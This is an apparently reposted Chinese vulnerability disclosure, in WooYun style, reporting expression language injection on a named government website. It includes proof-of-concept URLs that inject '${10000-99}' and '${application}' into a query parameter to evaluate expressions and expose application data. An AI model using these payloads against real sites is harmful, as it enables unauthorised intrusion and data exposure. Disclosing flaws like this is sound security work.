Expression language injection
来源:互联网 发布:矩阵可逆与秩的关系 编辑:程序博客网 时间:2024/06/05 21:00
Expression language injection
详细说明:
站点:http://www.zjhz.lss.gov.cn/
测试连接:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d
效果如图:
测试方法是参照这个的:
大众点评某站点Expression language injection | WooYun-2014-71160 | WooYun.org
WooYun: 大众点评某站点Expression language injection
应该是这样玩的吧(⊙v⊙)
漏洞证明:
http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d
view-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}
0 0
- expression language injection
- Expression language injection
- Expression Language
- Expression Language
- Unified Expression Language
- JSP Expression Language
- EL(Expression Language)
- EL(Expression Language)初步
- EL(Expression Language)
- EL(expression language)表达式
- JSF---->JSF Expression Language
- Spring Expression Language (SpEL)
- EL(Expression Language)
- Mule Expression Language Guide
- 【EL】expression language
- 【EL】expression language
- JSP EL expression language
- JavaWeb---EL(Expression Language)
- android状态栏沉浸效果(还没整理好,晚上整理)
- Unity3D之在指定地形中实现拖拽物体
- 解决sdk安装失败
- openwrt dns解析流程
- 安装环境之安装前准备2
- Expression language injection
- 题目编号001:二叉查找树转变成排序的双向链表
- Junit4简单教程
- QT
- Mybatis基于注解实现增删查改和多参数列表查询
- Maven project
- Windows7 IIS7.5部署ASP网站
- '<>' operator is not allowed for source level below 1.7
- 安装环境之安装前准备3
